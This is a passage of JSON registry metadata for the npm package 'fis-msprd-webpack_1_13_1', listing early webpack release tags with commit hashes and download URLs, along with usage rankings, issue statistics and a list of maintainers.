cies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-27T14:52:07.286Z","dependent_packages_count":1,"downloads":13,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":45.76322889354142,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.08519633301126976,"forks_count":0.5290750012268107,"average":17.585885354417208},"purl":"pkg:npm/fis-msprd-webpack_1_13_1","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/fis-msprd-webpack_1_13_1","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/fis-msprd-webpack_1_13_1","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/fis-msprd-webpack_1_13_1/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-27T00:06:34.042Z","issues_count":10163,"pull_requests_count":9431,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2776093.13365612,"issues_closed_count":9897,"pull_requests_closed_count":8881,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.83508806454787,"avg_comments_per_pull_request":3.1767575018555827,"merged_pull_requests_count":6017,"bot_issues_count":8,"bot_pull_requests_count":2912,"past_year_issues_count":79,"past_year_pull_requests_count":934,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":362218.7858117326,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":733,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":61,"past_year_avg_comments_per_issue":3.481012658227848,"past_year_avg_comments_per_pull_request":4.836188436830835,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":579,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1075,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/